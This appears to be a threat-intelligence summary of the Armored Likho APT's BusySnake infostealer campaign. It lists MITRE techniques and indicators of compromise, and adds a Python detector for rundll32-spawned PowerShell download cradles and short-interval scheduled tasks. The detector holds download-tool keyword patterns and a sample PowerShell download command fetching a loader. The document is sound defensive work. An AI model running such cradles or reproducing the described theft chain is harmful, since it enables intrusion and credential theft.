Armored Likho digging a snake pit: inside the covert BusySnake Stealer campaign

Researchers uncovered Armored Likho, a previously unknown APT also linked to Eagle Werewolf, running phishing campaigns against government and electric power targets in Russia, Brazil, and Kazakhstan. The group deploys BusySnake Stealer, an AI-assisted Python infostealer with browser credential theft, cookie theft, reverse SSH tunneling, and scheduled-task persistence, while Kaspersky detects and blocks the activity. #ArmoredLikho #EagleWerewolf #BusySnakeStealer #AquilaRAT #Go2Tunnel #RustDesk

Keypoints

  • Armored Likho is a newly identified APT group, also associated with Eagle Werewolf based on circumstantial evidence.
  • The campaign targets government agencies and the electric power sector, with confirmed activity in Russia, Brazil, and Kazakhstan.
  • Initial access commonly relies on spear-phishing emails carrying malicious EXE, LNK, RAR, ZIP, or BAT-based payloads disguised as official notices or aid-related documents.
  • The main payload is BusySnake Stealer, a Python-based infostealer protected with PyArmor and designed to evade static and dynamic analysis.
  • The malware steals clipboard data, browser passwords, cookies, documents, screenshots, Telegram data, wallet files, and OTP-related secrets.
  • BusySnake Stealer includes built-in reverse SSH tunneling and scheduled-task persistence, showing increasing operational maturity and tool integration.
  • Kaspersky solutions detect the attack chain, including the LNK downloader stage and subsequent payload delivery from GitHub and attacker-controlled infrastructure.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – The actors deliver malicious archives and files through targeted emails themed as government notices or social programs. (‘attackers distributed malicious attachments inside archive files’ / ‘uses spear-phishing emails’)
  • [T1204.002] User Execution: Malicious File – Victims are tricked into opening EXE, LNK, or archive-contained payloads that start the infection chain. (‘when the victim opens the file’ / ‘when the user runs the malicious LNK file’)
  • [T1218.011] System Binary Proxy Execution: Rundll32 – The LNK chain uses rundll32.exe to run an obfuscated command that launches PowerShell. (‘the shortcut runs an obfuscated command via rundll32.exe’)
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell is used to download and execute the loader. (‘spawns a PowerShell command that downloads and executes the malicious loader’)
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – VBScript files are created to delete the initial loader and launch the payload. (‘creates two VBScript files’ / ‘used to wipe the initial pnx.exe loader’)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – Persistence is maintained by creating a scheduled task that runs the stealer every five minutes. (‘used to ensure persistence on the system by creating a scheduled task’)
  • [T1055] Process Injection – The dropper injects code into pnx.exe process memory to execute the malicious loader. (‘Code is then injected into the pnx.exe process memory’)
  • [T1027] Obfuscated Files or Information – The campaign heavily uses obfuscation, including hidden command lines, encrypted code, and protected payloads. (‘obfuscated command’ / ‘code is obfuscated and encrypted using PyArmor Pro’)
  • [T1105] Ingress Tool Transfer – The malware downloads multiple archives, Python components, browser modules, and payloads from GitHub and attacker infrastructure. (‘fetches several archives hosted in GitHub repositories’)
  • [T1071.001] Application Layer Protocol: Web Protocols – The stealer communicates with its C2 using HTTP/HTTPS endpoints and web requests. (‘GET /get_task’ / ‘POST /report_status’)
  • [T1119] Automated Collection – The malware continuously inventories files, scans for keys, and harvests browser and clipboard data. (‘enumerates files and directories’ / ‘polls the clipboard contents in an infinite loop’)
  • [T1115] Clipboard Data – The stealer collects clipboard contents and OTP secrets from the clipboard. (‘begins harvesting data from the system clipboard’)
  • [T1005] Data from Local System – Files, browser databases, Telegram data, and wallet files are collected from local storage. (‘sweeps user directories’ / ‘harvests Telegram session and credential data’)
  • [T1003.001] OS Credential Dumping: LSASS Memory – not used; the stealer instead targets browser credential storage, decrypting Chromium and Firefox saved passwords. (‘decrypts stored passwords from Chromium-based browser databases’ / ‘PK11SDR_Decrypt’)
  • [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – Browser login data and cookies are extracted from browser databases. (‘extracts cookies using a workflow nearly identical to its browser credential theft routine’)
  • [T1041] Exfiltration Over C2 Channel – Stolen data is uploaded to the attacker-controlled C2 server. (‘forwarded to the C2 server’ / ‘exfiltrates it to the C2 server’)
  • [T1021.002] Remote Services: SMB/Windows Admin Shares – not used; remote access is instead obtained through a reverse SSH tunnel established by the malware. (‘initiates a connection to a remote server controlled by the attackers’)
  • [T1106] Native API – Windows DPAPI and NSS functions are used to decrypt protected browser secrets. (‘win32crypt.CryptUnprotectData()’ / ‘PK11SDR_Decrypt()’)
  • [T1497.001] Virtualization/Sandbox Evasion: System Checks – The malware uses delayed execution and dynamic decryption to hinder analysis. (‘pauses execution before triggering malicious routines’ / ‘decrypts its bytecode only at the exact moment a function is called’)
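The execution chain and persistence mechanism listed above (rundll32.exe spawning a PowerShell downloader, then a scheduled task that re-runs the payload every five minutes) are the most detectable parts of this intrusion from an endpoint telemetry standpoint. The following is an added example of that detection logic, not code from the Securelist article or from Kaspersky. The event records and their field names are constructed to resemble a simplified Sysmon-style process-creation and task-creation feed; the task name, paths and URL in the samples are placeholders and are not indicators from the report.

```python
"""Detection helper for the BusySnake-style chain described in the summary:
rundll32.exe -> PowerShell download cradle, plus a short-interval scheduled
task that runs a script/Python payload. Added example; field layout assumed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Simplified process-creation record (assumed field layout)."""
    pid: int
    image: str
    cmdline: str
    parent_image: str


@dataclass
class TaskEvent:
    """Simplified scheduled-task-creation record (assumed field layout)."""
    task_name: str
    action: str
    interval_minutes: int


# Keywords commonly found in PowerShell download cradles and encoded launchers.
DOWNLOAD_HINTS = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b"
    r"|net\.webclient|start-bitstransfer"
)
ENCODED_HINTS = re.compile(r"(?i)\s-e(nc|ncodedcommand)?\s|frombase64string")

# Actions that look like a script host or Python payload rather than a signed updater.
SCRIPT_PAYLOAD = re.compile(r"(?i)\.(pyw?|vbs|bat|cmd|ps1)\b|pythonw?\.exe|[wc]script")


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def flag_rundll32_powershell(events):
    """PIDs of PowerShell processes whose parent is rundll32.exe and whose
    command line contains a download or encoded-command indicator."""
    hits = []
    for e in events:
        if basename(e.parent_image) != "rundll32.exe":
            continue
        if basename(e.image) not in ("powershell.exe", "pwsh.exe"):
            continue
        if DOWNLOAD_HINTS.search(e.cmdline) or ENCODED_HINTS.search(e.cmdline):
            hits.append(e.pid)
    return hits


def flag_short_interval_tasks(tasks, max_minutes: int = 5):
    """Task names that run a script/Python payload at an interval of at most
    max_minutes; the report describes a five-minute re-execution task."""
    return [
        t.task_name
        for t in tasks
        if t.interval_minutes <= max_minutes and SCRIPT_PAYLOAD.search(t.action)
    ]


def triage(events, tasks):
    """Combine both checks into one dictionary suitable for an alert payload."""
    return {
        "rundll32_powershell_downloaders": flag_rundll32_powershell(events),
        "short_interval_script_tasks": flag_short_interval_tasks(tasks),
    }


# Constructed sample telemetry (not real events from the campaign).
SAMPLE_PROCS = [
    ProcEvent(2000, r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe <obfuscated arguments>", r"C:\Windows\explorer.exe"),
    ProcEvent(4012, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
              ".DownloadFile('http://example.invalid/loader.exe','loader.exe')\"",
              r"C:\Windows\System32\rundll32.exe"),
    ProcEvent(5000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c Get-Date", r"C:\Windows\explorer.exe"),  # benign
    ProcEvent(6000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-ChildItem", r"C:\Windows\System32\rundll32.exe"),  # no cradle
]
SAMPLE_TASKS = [
    TaskEvent("ConstructedHelperTask", r"C:\Users\u\AppData\Roaming\Placeholder\module.pyw", 5),
    TaskEvent("MicrosoftEdgeUpdateTaskMachineUA",
              r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe", 60),
    TaskEvent("NightlyBackup", r"C:\Tools\backup.ps1", 1440),  # script, but not short-interval
]

if __name__ == "__main__":
    print(triage(SAMPLE_PROCS, SAMPLE_TASKS))
```

The parent/child pairing is the robust signal here: rundll32.exe has few legitimate reasons to spawn PowerShell, so the keyword list only serves to reduce noise, and the scheduled-task check pairs an unusually short interval with a script-host or Python action rather than matching on any one task name.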

Indicators of Compromise

  • [IP address] C2 and tunnel infrastructure – 159.198.41.140, 159.198.32.222, and 2 other items
  • [Domain] C2 and tunneling endpoints – grked[.]online, winupdate[.]live, and 5 other items
  • [File hash] First-stage and stealer samples – 5D5C3E483C5E544260CE98FC29FBF192, C7622A1EFFA27BBFEE6D6E03D6474343, and 17 other items
  • [File name] Malicious archives, droppers, and payloads – psihologicheskiy_test.exe, module.pyw, and 15 other items
  • [File name] Persistence and data files – wh_selfdelete.vbs, run.vbs, chromium_passwords.json, and 4 other items
  • [URL] C2 tasking and tunnel creation – https://grked[.]online/tunnel/create/?username=[redacted], http://127.0.0.1:8000/?data_type=c
  • [Registry / path] Working and staging locations – Roaming\WindowsHelper\screenshots.lock, $appdata\WindowsHelper, and 3 other items

Read more: https://securelist.com/tr/armored-likho-apt-with-busysnake-stealer/120292/